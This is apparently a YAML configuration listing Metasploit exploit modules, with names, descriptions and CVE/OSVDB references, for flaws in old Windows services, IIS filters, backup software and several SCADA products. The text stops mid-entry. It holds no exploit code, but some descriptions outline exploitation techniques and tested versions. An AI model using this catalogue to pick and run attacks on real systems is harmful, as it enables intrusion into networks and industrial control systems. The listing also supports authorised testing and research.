path: extensions/metasploit/
class: Msf_module
msf_ms07_065_msmq:
enable: true
msf: true
msf_key: windows/dcerpc/ms07_065_msmq
name: Microsoft Message Queueing Service DNS Name Path Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the RPC interface\n\
\t\t\tto the Microsoft Message Queueing service. This exploit requires\n\
\t\t\tthe target system to have been configured with a DNS name and\n\
\t\t\tfor that name to be supplied in the 'DNAME' option. This name does\n\
\t\t\tnot need to be served by a valid DNS server, only configured on\n\
\t\t\tthe target machine.\n\n\
\t\t\t"
authors:
- - CVE
- 2007-3039
- - OSVDB
- "39123"
- - MSB
- MS07-065
path: extensions/metasploit/
class: Msf_module
msf_ms03_026_dcom:
enable: true
msf: true
msf_key: windows/dcerpc/ms03_026_dcom
name: Microsoft RPC DCOM Interface Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the RPCSS service, this vulnerability\n\
\t\t\t\twas originally found by the Last Stage of Delirium research group and has been\n\
\t\t\t\twidely exploited ever since. This module can exploit the English versions of\n\
\t\t\t\tWindows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)\n\
\t\t\t"
authors:
- - CVE
- 2003-0352
- - OSVDB
- "2100"
- - MSB
- MS03-026
- - BID
- "8205"
path: extensions/metasploit/
class: Msf_module
msf_name_service:
enable: true
msf: true
msf_key: windows/backupexec/name_service
name: Veritas Backup Exec Name Service Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the Veritas Backup\n\
\t\t\t\tExec Agent Browser service. This vulnerability occurs when a\n\
\t\t\t\trecv() call has a length value too long for the\tdestination\n\
\t\t\t\tstack buffer. By sending an agent name value of 63 bytes or\n\
\t\t\t\tmore, we can overwrite the return address of the recv\n\
\t\t\t\tfunction. Since we only have ~60 bytes of contiguous space\n\
\t\t\t\tfor shellcode, a tiny findsock payload is sent which uses a\n\
\t\t\t\thardcoded IAT address for the recv() function. This payload\n\
\t\t\t\twill then roll the stack back to the beginning of the page,\n\
\t\t\t\trecv() the real shellcode into it, and jump to it. This\n\
\t\t\t\tmodule has been tested against Veritas 9.1 SP0, 9.1 SP1, and\n\
\t\t\t\t8.6.\n\
\t\t\t"
authors:
- - CVE
- 2004-1172
- - OSVDB
- "12418"
- - BID
- "11974"
- - URL
- http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities
path: extensions/metasploit/
class: Msf_module
msf_remote_agent:
enable: true
msf: true
msf_key: windows/backupexec/remote_agent
name: Veritas Backup Exec Windows Remote Agent Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Veritas\n\
\t\t\t\tBackupExec Windows Agent software. This vulnerability occurs\n\
\t\t\t\twhen a client authentication request is received with type\n\
\t\t\t\t'3' and a long password argument. Reliable execution is\n\
\t\t\t\tobtained by abusing the stack buffer overflow to smash a SEH\n\
\t\t\t\tpointer.\n\
\t\t\t"
authors:
- - CVE
- 2005-0773
- - OSVDB
- "17624"
- - BID
- "14022"
- - URL
- http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities
- - URL
- http://seer.support.veritas.com/docs/276604.htm
path: extensions/metasploit/
class: Msf_module
msf_w3who_query:
enable: true
msf: true
msf_key: windows/isapi/w3who_query
name: Microsoft IIS ISAPI w3who.dll Query String Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the w3who.dll ISAPI\n\
\t\t\t\tapplication. This vulnerability was discovered Nicolas\n\
\t\t\t\tGregoire and this code has been successfully tested against\n\
\t\t\t\tWindows 2000 and Windows XP (SP2). When exploiting Windows\n\
\t\t\t\tXP, the payload must call RevertToSelf before it will be\n\
\t\t\t\table to spawn a command shell.\n\n\
\t\t\t"
authors:
- - CVE
- 2004-1134
- - OSVDB
- "12258"
- - URL
- http://www.exaprobe.com/labs/advisories/esa-2004-1206.html
- - BID
- "11820"
path: extensions/metasploit/
class: Msf_module
msf_rsa_webagent_redirect:
enable: true
msf: true
msf_key: windows/isapi/rsa_webagent_redirect
name: Microsoft IIS ISAPI RSA WebAgent Redirect Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the SecurID Web\n\
\t\t\t\tAgent for IIS. This ISAPI filter runs in-process with\n\
\t\t\t\tinetinfo.exe, any attempt to exploit this flaw will result\n\
\t\t\t\tin the termination and potential restart of the IIS service.\n\n\
\t\t\t"
authors:
- - CVE
- 2005-4734
- - OSVDB
- "20151"
path: extensions/metasploit/
class: Msf_module
msf_ms03_022_nsiislog_post:
enable: true
msf: true
msf_key: windows/isapi/ms03_022_nsiislog_post
name: Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a buffer overflow found in the nsiislog.dll\n\
\t\t\t\tISAPI filter that comes with Windows Media Server. This\n\
\t\t\t\tmodule will also work against the 'patched' MS03-019\n\
\t\t\t\tversion. This vulnerability was addressed by MS03-022.\n\
\t\t\t"
authors:
- - CVE
- 2003-0349
- - OSVDB
- "4535"
- - BID
- "8035"
- - MSB
- MS03-022
- - URL
- http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html
path: extensions/metasploit/
class: Msf_module
msf_ms00_094_pbserver:
enable: true
msf: true
msf_key: windows/isapi/ms00_094_pbserver
name: Microsoft IIS Phone Book Service Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for the Phone Book Service /pbserver/pbserver.dll\n\
\t\t\t\tdescribed in MS00-094. By sending an overly long URL argument\n\
\t\t\t\tfor phone book updates, it is possible to overwrite the stack. This\n\
\t\t\t\tmodule has only been tested against Windows 2000 SP1.\n\
\t\t\t"
authors:
- - CVE
- 2000-1089
- - OSVDB
- "463"
- - BID
- "2048"
- - MSB
- MS00-094
path: extensions/metasploit/
class: Msf_module
msf_ms03_051_fp30reg_chunked:
enable: true
msf: true
msf_key: windows/isapi/ms03_051_fp30reg_chunked
name: Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for the chunked encoding buffer overflow\n\
\t\t\t\tdescribed in MS03-051 and originally reported by Brett\n\
\t\t\t\tMoore. This particular modules works against versions of\n\
\t\t\t\tWindows 2000 between SP0 and SP3. Service Pack 4 fixes the\n\
\t\t\t\tissue.\n\
\t\t\t"
authors:
- - CVE
- 2003-0822
- - OSVDB
- "2952"
- - BID
- "9007"
- - MSB
- MS03-051
path: extensions/metasploit/
class: Msf_module
msf_cam_log_security:
enable: true
msf: true
msf_key: windows/unicenter/cam_log_security
name: CA CAM log_security() Stack Buffer Overflow (Win32)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the CA CAM service\n\
\t\t\t\tby passing a long parameter to the log_security() function.\n\
\t\t\t\tThe CAM service is part of TNG Unicenter. This module has\n\
\t\t\t\tbeen tested on Unicenter v3.1.\n\
\t\t\t"
authors:
- - CVE
- 2005-2668
- - OSVDB
- "18916"
- - BID
- "14622"
path: extensions/metasploit/
class: Msf_module
msf_igss9_igssdataserver_listall:
enable: true
msf: true
msf_key: windows/scada/igss9_igssdataserver_listall
name: 7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies\n\
\t\t\t\tIGSS up to version 9.00.00 b11063. While processing a ListAll command, the application\n\
\t\t\t\tfails to do proper bounds checking before copying data into a small buffer on the stack.\n\
\t\t\t\tThis causes a buffer overflow and allows to overwrite a structured exception handling record\n\
\t\t\t\ton the stack, allowing for unauthenticated remote code execution. Also, after the payload\n\
\t\t\t\texits, IGSSdataServer.exe should automatically recover.\n\
\t\t\t"
authors:
- - CVE
- 2011-1567
- - OSVDB
- "72353"
- - URL
- http://aluigi.altervista.org/adv/igss_2-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_factorylink_vrn_09:
enable: true
msf: true
msf_key: windows/scada/factorylink_vrn_09
name: Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2,\n\
\t\t\t\tand 8.0.1.703. By sending a specially crafted packet, an attacker may be able to\n\
\t\t\t\texecute arbitrary code due to the improper use of a vsprintf() function while\n\
\t\t\t\tprocessing the user-supplied text field. Originally found and posted by\n\
\t\t\t\tLuigi Auriemma.\n\
\t\t\t"
authors:
- - OSVDB
- "72815"
- - URL
- http://aluigi.altervista.org/adv/factorylink_4-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_realwin:
enable: true
msf: true
msf_key: windows/scada/realwin
name: DATAC RealWin SCADA Server Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in DATAC Control\n\
\t\t\t\tInternational RealWin SCADA Server 2.0 (Build 6.0.10.37).\n\
\t\t\t\tBy sending a specially crafted FC_INFOTAG/SET_CONTROL packet,\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-4322
- - OSVDB
- "48606"
- - BID
- "31418"
path: extensions/metasploit/
class: Msf_module
msf_realwin_scpc_initialize:
enable: true
msf: true
msf_key: windows/scada/realwin_scpc_initialize
name: DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in DATAC Control\n\
\t\t\t\tInternational RealWin SCADA Server 2.0 (Build 6.1.8.10).\n\
\t\t\t\tBy sending a specially crafted packet, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "68812"
- - CVE
- 2010-4142
- - URL
- http://aluigi.altervista.org/adv/realwin_1-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_iconics_genbroker:
enable: true
msf: true
msf_key: windows/scada/iconics_genbroker
name: Iconics GENESIS32 Integer overflow version 9.21.201.01
category: Metasploit
description: "\n\
\t\t\t\t\tThe GenBroker service on port 38080 is affected by three integer overflow\n\
\t\t\t\tvulnerabilities while handling opcode 0x4b0, which is caused by abusing the\n\
\t\t\t\tthe memory allocations needed for the number of elements passed by the client.\n\
\t\t\t\tThis results unexpected behaviors such as direct registry calls, memory location\n\
\t\t\t\tcalls, or arbitrary remote code execution. Please note that in order to ensure\n\
\t\t\t\treliability, this exploit will try to open calc (hidden), inject itself into the\n\
\t\t\t\tprocess, and then open up a shell session. Also, DEP bypass is supported.\n\
\t\t\t"
authors:
- - URL
- http://aluigi.org/adv/genesis_4-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_moxa_mdmtool:
enable: true
msf: true
msf_key: windows/scada/moxa_mdmtool
name: MOXA Device Manager Tool 2.1 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in MOXA MDM Tool 2.1.\n\
\t\t\t\tWhen sending a specially crafted MDMGw (MDM2_Gateway) response, an\n\
\t\t\t\tattacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "69027"
- - URL
- http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=
- - URL
- http://www.us-cert.gov/control_systems/pdf/ICS-Alert-10-293-02.pdf
path: extensions/metasploit/
class: Msf_module
msf_iconics_webhmi_setactivexguid:
enable: true
msf: true
msf_key: windows/scada/iconics_webhmi_setactivexguid
name: ICONICS WebHMI ActiveX Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability found in ICONICS WebHMI's ActiveX control.\n\
\t\t\t\tBy supplying a long string of data to the 'SetActiveXGUID' parameter, GenVersion.dll\n\
\t\t\t\tfails to do any proper bounds checking before this input is copied onto the stack,\n\
\t\t\t\twhich causes a buffer overflow, and results arbitrary code execution under the context\n\
\t\t\t\tof the user.\n\
\t\t\t"
authors:
- - OSVDB
- "72135"
- - URL
- http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf
- - URL
- http://www.exploit-db.com/exploits/17240/
path: extensions/metasploit/
class: Msf_module
msf_igss9_igssdataserver_rename:
enable: true
msf: true
msf_key: windows/scada/igss9_igssdataserver_rename
name: 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability found on 7-Technologies IGSS 9. By supplying\n\
\t\t\t\ta long string of data to the 'Rename' (0x02), 'Delete' (0x03), or 'Add' (0x04) command,\n\
\t\t\t\ta buffer overflow condition occurs in IGSSdataServer.exe while handing an RMS report,\n\
\t\t\t\twhich results arbitrary code execution under the context of the user.\n\n\
\t\t\t\tThe attack is carried out in three stages. The first stage sends the final payload to\n\
\t\t\t\tIGSSdataServer.exe, which will remain in memory. The second stage sends the Add command\n\
\t\t\t\tso the process can find a valid ID for the Rename command. The last stage then triggers\n\
\t\t\t\tthe vulnerability with the Rename command, and uses an egghunter to search for the\n\
\t\t\t\tshellcode that we sent in stage 1. The use of egghunter appears to be necessary due to\n\
\t\t\t\tthe small buffer size, which cannot even contain our ROP chain and the final payload.\n\
\t\t\t"
authors:
- - CVE
- 2011-1567
- - OSVDB
- "72352"
- - URL
- http://aluigi.altervista.org/adv/igss_5-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_realwin_on_fc_binfile_a:
enable: true
msf: true
msf_key: windows/scada/realwin_on_fc_binfile_a
name: DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability found in DATAC Control International RealWin\n\
\t\t\t\tSCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE\n\
\t\t\t\tpacket via port 910, RealWin will try to create a file (which would be saved to\n\
\t\t\t\tC:\\Program Files\\DATAC\\Real Win\\RW-version\\filename) by first copying the user-\n\
\t\t\t\tsupplied filename with a inline memcpy routine without proper bounds checking, which\n\
\t\t\t\tresults a stack-based buffer overflow, allowing arbitrary remote code execution.\n\n\
\t\t\t\tTested version: 2.0 (Build 6.1.8.10)\n\
\t\t\t"
authors:
- - CVE
- 2011-1563
- - OSVDB
- "72826"
- - BID
- "46937"
- - URL
- http://aluigi.altervista.org/adv/realwin_5-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_igss9_misc:
enable: true
msf: true
msf_key: windows/scada/igss9_misc
name: 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits multiple vulnerabilities found on IGSS 9's Data Server and\n\
\t\t\t\tData Collector services. The initial approach is first by transferring our binary\n\
\t\t\t\twith Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then send\n\
\t\t\t\tan EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run\n\
\t\t\t\tthat payload with a CreateProcessA() function as a new thread.\n\
\t\t\t"
authors:
- - OSVDB
- "72354"
- - OSVDB
- "72349"
- - URL
- http://aluigi.altervista.org/adv/igss_1-adv.txt
- - URL
- http://aluigi.altervista.org/adv/igss_8-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_factorylink_csservice:
enable: true
msf: true
msf_key: windows/scada/factorylink_csservice
name: Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability found on Siemens FactoryLink 8. The\n\
\t\t\t\tvulnerability occurs when CSService.exe processes a CSMSG_ListFiles_REQ message,\n\
\t\t\t\tthe user-supplied path first gets converted to ANSI format (CodePage 0), and then\n\
\t\t\t\tgets handled by a logging routine where proper bounds checking is not done,\n\
\t\t\t\ttherefore causing a stack-based buffer overflow, and results arbitrary code execution.\n\
\t\t\t"
authors:
- - OSVDB
- "72812"
- - URL
- http://aluigi.altervista.org/adv/factorylink_1-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_winlog_runtime:
enable: true
msf: true
msf_key: windows/scada/winlog_runtime
name: Sielco Sistemi Winlog Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Sielco\n\
\t\t\t\tSistem Winlog <= 2.07.00. When sending a specially formatted\n\
\t\t\t\tpacket to the Runtime.exe service, an attacker may be able to\n\
\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2011-0517
- - OSVDB
- "70418"
- - URL
- http://aluigi.org/adv/winlog_1-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_realwin_on_fcs_login:
enable: true
msf: true
msf_key: windows/scada/realwin_on_fcs_login
name: RealWin SCADA Server DATAC Login Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in DATAC Control\n\
\t\t\t\tInternational RealWin SCADA Server 2.1 (Build 6.0.10.10) or\n\
\t\t\t\tearlier. By sending a specially crafted On_FC_CONNECT_FCS_LOGIN\n\
\t\t\t\tpacket containing a long username, an attacker may be able to\n\
\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2011-1563
- - OSVDB
- "72824"
- - URL
- http://aluigi.altervista.org/adv/realwin_2-adv.txt
- - URL
- http://www.dataconline.com/software/realwin.php
path: extensions/metasploit/
class: Msf_module
msf_citect_scada_odbc:
enable: true
msf: true
msf_key: windows/scada/citect_scada_odbc
name: CitectSCADA/CitectFacilities ODBC Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in CitectSCADA's ODBC daemon.\n\
\t\t\t\tThis has only been tested against Citect v5, v6 and v7.\n\
\t\t\t"
authors:
- - CVE
- 2008-2639
- - BID
- "29634"
- - OSVDB
- "46105"
- - URL
- http://www.coresecurity.com/content/citect-scada-odbc-service-vulnerability
- - URL
- http://www.auscert.org.au/render.html?it=9433
- - URL
- http://www.controsys.hu/anyagok/group_quality_assurance.pdf
- - URL
- http://www.citect.com/documents/news_and_media/pr-citect-address-security.pdf
path: extensions/metasploit/
class: Msf_module
msf_realwin_scpc_txtevent:
enable: true
msf: true
msf_key: windows/scada/realwin_scpc_txtevent
name: DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in DATAC Control\n\
\t\t\t\tInternational RealWin SCADA Server 2.0 (Build 6.1.8.10).\n\
\t\t\t\tBy sending a specially crafted packet,\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-4142
- - OSVDB
- "68812"
path: extensions/metasploit/
class: Msf_module
msf_realwin_scpc_initialize_rf:
enable: true
msf: true
msf_key: windows/scada/realwin_scpc_initialize_rf
name: DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in DATAC Control\n\
\t\t\t\tInternational RealWin SCADA Server 2.0 (Build 6.1.8.10).\n\
\t\t\t\tBy sending a specially crafted packet, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "68812"
- - CVE
- 2010-4142
- - URL
- http://aluigi.altervista.org/adv/realwin_1-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_timbuktu_fileupload:
enable: true
msf: true
msf_key: windows/motorola/timbuktu_fileupload
name: Timbuktu Pro Directory Traversal/File Upload
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a directory traversal vulnerablity in Motorola's\n\
\t\t\t\tTimbuktu Pro for Windows 8.6.5.\n\
\t\t\t"
authors:
- - CVE
- 2008-1117
- - OSVDB
- "43544"
path: extensions/metasploit/
class: Msf_module
msf_ms04_031_netdde:
enable: true
msf: true
msf_key: windows/smb/ms04_031_netdde
name: Microsoft NetDDE Service Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the NetDDE service, which is the\n\
\t\t\t\tprecursor to the DCOM interface. This exploit effects only operating systems\n\
\t\t\t\treleased prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim\n\
\t\t\t\tthat this vulnerability can be exploited without authentication, the NDDEAPI\n\
\t\t\t\tpipe is only accessible after successful authentication.\n\
\t\t\t"
authors:
- - CVE
- 2004-0206
- - OSVDB
- "10689"
- - BID
- "11372"
- - MSB
- MS04-031
path: extensions/metasploit/
class: Msf_module
msf_ms04_011_lsass:
enable: true
msf: true
msf_key: windows/smb/ms04_011_lsass
name: Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the LSASS service, this vulnerability\n\
\t\t\t\twas originally found by eEye. When re-exploiting a Windows XP system, you will need\n\
\t\t\t\tneed to run this module twice. DCERPC request fragmentation can be performed by setting\n\
\t\t\t\t'FragSize' parameter.\n\
\t\t\t"
authors:
- - CVE
- 2003-0533
- - OSVDB
- "5248"
- - BID
- "10108"
- - MSB
- MS04-011
path: extensions/metasploit/
class: Msf_module
msf_ms06_070_wkssvc:
enable: true
msf: true
msf_key: windows/smb/ms06_070_wkssvc
name: Microsoft Workstation Service NetpManageIPCConnect Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect\n\
\t\t\t\tfunction using the Workstation service in Windows 2000 SP4 and Windows XP SP2.\n\n\
\t\t\t\tIn order to exploit this vulnerability, you must specify a the name of a\n\
\t\t\t\tvalid Windows DOMAIN. It may be possible to satisfy this condition by using\n\
\t\t\t\ta custom dns and ldap setup, however that method is not covered here.\n\n\
\t\t\t\tAlthough Windows XP SP2 is vulnerable, Microsoft reports that Administrator\n\
\t\t\t\tcredentials are required to reach the vulnerable code. Windows XP SP1 only\n\
\t\t\t\trequires valid user credentials. Also, testing shows that a machine already\n\
\t\t\t\tjoined to a domain is not exploitable.\n\
\t\t\t"
authors:
- - CVE
- 2006-4691
- - OSVDB
- "30263"
- - BID
- "20985"
- - MSB
- MS06-070
path: extensions/metasploit/
class: Msf_module
msf_ms05_039_pnp:
enable: true
msf: true
msf_key: windows/smb/ms05_039_pnp
name: Microsoft Plug and Play Service Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Windows Plug\n\
\t\t\t\tand Play service. This vulnerability can be exploited on\n\
\t\t\t\tWindows 2000 without a valid user account.\n\n\
\t\t\t\tNOTE: Since the PnP service runs inside the service.exe process, a failed\n\
\t\t\t\texploit attempt will cause the system to automatically reboot.\n\
\t\t\t"
authors:
- - CVE
- 2005-1983
- - OSVDB
- "18605"
- - BID
- "14513"
- - MSB
- MS05-039
- - URL
- http://www.hsc.fr/ressources/presentations/null_sessions/
path: extensions/metasploit/
class: Msf_module
msf_timbuktu_plughntcommand_bof:
enable: true
msf: true
msf_key: windows/smb/timbuktu_plughntcommand_bof
name: Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6\n\
\t\t\t\tin a pretty novel way.\n\n\
\t\t\t\tThis exploit requires two connections. The first connection is used to leak stack data\n\
\t\t\t\tusing the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying\n\
\t\t\t\ta large value for this argument it is possible to cause Timbuktu to reply to the initial\n\
\t\t\t\trequest with leaked stack data. Using this data allows for reliable exploitation of the\n\
\t\t\t\tbuffer overflow vulnerability.\n\n\
\t\t\t\tProps to Infamous41d for helping in finding this exploitation path.\n\n\
\t\t\t\tThe second connection utilizes the data from the data leak to accurately exploit\n\
\t\t\t\tthe stack based buffer overflow vulnerability.\n\n\
\t\t\t\tTODO:\n\
\t\t\t\thdm suggested using meterpreter's migration capability and restarting the process\n\
\t\t\t\tfor multishot exploitation.\n\
\t\t\t"
authors:
- - CVE
- 2009-1394
- - OSVDB
- "55436"
- - BID
- "35496"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809
path: extensions/metasploit/
class: Msf_module
msf_netidentity_xtierrpcpipe:
enable: true
msf: true
msf_key: windows/smb/netidentity_xtierrpcpipe
name: Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending\n\
\t\t\t\ta specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be\n\
\t\t\t\table to execute arbitrary code. The success of this module is much greater once the\n\
\t\t\t\tservice has been restarted.\n\
\t\t\t"
authors:
- - CVE
- 2009-1350
- - OSVDB
- "53351"
- - BID
- "34400"
- - URL
- http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1
path: extensions/metasploit/
class: Msf_module
msf_ms06_025_rasmans_reg:
enable: true
msf: true
msf_key: windows/smb/ms06_025_rasmans_reg
name: Microsoft RRAS Service RASMAN Registry Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a registry-based stack buffer overflow in the Windows Routing\n\
\t\t\t\tand Remote Access Service. Since the service is hosted inside svchost.exe,\n\
\t\t\t\ta failed exploit attempt can cause other system services to fail as well.\n\
\t\t\t\tA valid username and password is required to exploit this flaw on Windows 2000.\n\
\t\t\t\tWhen attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.\n\
\t\t\t\tExploiting this flaw involves two distinct steps - creating the registry key\n\
\t\t\t\tand then triggering an overwrite based on a read of this key. Once the key is\n\
\t\t\t\tcreated, it cannot be recreated. This means that for any given system, you\n\
\t\t\t\tonly get one chance to exploit this flaw. Picking the wrong target will require\n\
\t\t\t\ta manual removal of the following registry key before you can try again:\n\
\t\t\t\tHKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook\n\
\t\t\t"
authors:
- - CVE
- 2006-2370
- - OSVDB
- "26437"
- - BID
- "18325"
- - MSB
- MS06-025
path: extensions/metasploit/
class: Msf_module
msf_ms09_050_smb2_negotiate_func_index:
enable: true
msf: true
msf_key: windows/smb/ms09_050_smb2_negotiate_func_index
name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an out of bounds function table dereference in the SMB\n\
\t\t\t\trequest validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n\
\t\t\t\trelease candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista\n\
\t\t\t\twithout SP1 does not seem affected by this flaw.\n\
\t\t\t"
authors:
- - MSB
- MS09-050
- - CVE
- 2009-3103
- - BID
- "36299"
- - OSVDB
- "57799"
- - URL
- http://seclists.org/fulldisclosure/2009/Sep/0039.html
- - URL
- http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx
path: extensions/metasploit/
class: Msf_module
msf_ms04_007_killbill:
enable: true
msf: true
msf_key: windows/smb/ms04_007_killbill
name: Microsoft ASN.1 Library Bitstring Heap Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for a previously undisclosed\n\
\t\t\t\tvulnerability in the bit string decoding code in the\n\
\t\t\t\tMicrosoft ASN.1 library. This vulnerability is not related\n\
\t\t\t\tto the bit string vulnerability described in eEye advisory\n\
\t\t\t\tAD20040210-2. Both vulnerabilities were fixed in the\n\
\t\t\t\tMS04-007 patch.\n\n\
\t\t\t\tYou are only allowed one attempt with this vulnerability. If\n\
\t\t\t\tthe payload fails to execute, the LSASS system service will\n\
\t\t\t\tcrash and the target system will automatically reboot itself\n\
\t\t\t\tin 60 seconds. If the payload succeeeds, the system will no\n\
\t\t\t\tlonger be able to process authentication requests, denying\n\
\t\t\t\tall attempts to login through SMB or at the console. A\n\
\t\t\t\treboot is required to restore proper functioning of an\n\
\t\t\t\texploited system.\n\n\
\t\t\t\tThis exploit has been successfully tested with the win32/*/reverse_tcp\n\
\t\t\t\tpayloads, however a few problems were encounted when using the\n\
\t\t\t\tequivalent bind payloads. Your mileage may vary.\n\n\
\t\t\t"
authors:
- - CVE
- 2003-0818
- - OSVDB
- "3902"
- - BID
- "9633"
- - URL
- http://www.phreedom.org/solar/exploits/msasn1-bitstring/
- - MSB
- MS04-007
path: extensions/metasploit/
class: Msf_module
msf_ms03_049_netapi:
enable: true
msf: true
msf_key: windows/smb/ms03_049_netapi
name: Microsoft Workstation Service NetAddAlternateComputerName Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName\n\
\t\t\t\tfunction using the Workstation service in Windows XP.\n\
\t\t\t"
authors:
- - CVE
- 2003-0812
- - OSVDB
- "11461"
- - BID
- "9011"
- - MSB
- MS03-049
path: extensions/metasploit/
class: Msf_module
msf_ms06_025_rras:
enable: true
msf: true
msf_key: windows/smb/ms06_025_rras
name: Microsoft RRAS Service Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Windows Routing and Remote\n\
\t\t\t\tAccess Service. Since the service is hosted inside svchost.exe, a failed\n\
\t\t\t\texploit attempt can cause other system services to fail as well. A valid\n\
\t\t\t\tusername and password is required to exploit this flaw on Windows 2000.\n\
\t\t\t\tWhen attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.\t\t\t"
authors:
- - CVE
- 2006-2370
- - OSVDB
- "26437"
- - BID
- "18325"
- - MSB
- MS06-025
path: extensions/metasploit/
class: Msf_module
msf_ms06_066_nwapi:
enable: true
msf: true
msf_key: windows/smb/ms06_066_nwapi
name: Microsoft Services MS06-066 nwapi32.dll
category: Metasploit
description: "\n\
